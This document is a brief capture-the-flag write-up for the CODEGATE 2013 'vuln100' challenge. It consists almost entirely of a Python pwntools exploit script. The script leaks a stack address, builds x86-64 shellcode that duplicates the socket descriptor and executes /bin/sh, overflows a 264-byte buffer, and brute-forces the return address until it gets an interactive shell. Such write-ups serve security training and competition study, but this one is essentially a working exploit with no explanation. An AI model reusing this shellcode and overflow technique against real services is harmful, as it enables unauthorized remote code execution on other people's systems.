CODEGATE 2013 vuln100 writeup

vuln100.py

# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from pwn import *

REMOTE = False

if REMOTE:
    host = ''
    port = 0
else:
    host = '127.0.0.1'
    port = 6666

def connect():
    s = remote(host, port, silent=True)
    s.recv()
    s.recv()
    for answer in ['arsenal', 'gyeongbokgung', 'psy']:
        s.send(answer + '\n')
        s.recv()
        s.recv()
    return s

s = connect()
s.send('\0')

# stack leak
#print hexdump(s.recvall())

nickname = u64(s.recv(8))
log.info('leaked nickname address: %x' % nickname)

# close + dup2 + execve /bin/sh
shellcode = '\x48\x31\xff\x40\xb7\x03\x48\x31\xc0\xb0\x03\x0f\x05\x40\xb7\x04\x48\x31\xf6\x40\xb6\x03\x48\x31\xc0\x48\xff\xce\xb0\x21\x0f\x05\x75\xf4' + '\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x90'

# brute-force :)
for x in range(0, 1000, 8):
    print x
    s = connect()

    payload = (
        shellcode +
        '\x90' * (264 - len(shellcode)) +
        p64(nickname - x)
    )
    s.send(payload)
    s.recvall()

    s.send('ls\n')
    if s.recv():
        s.interactive()
        sys.exit()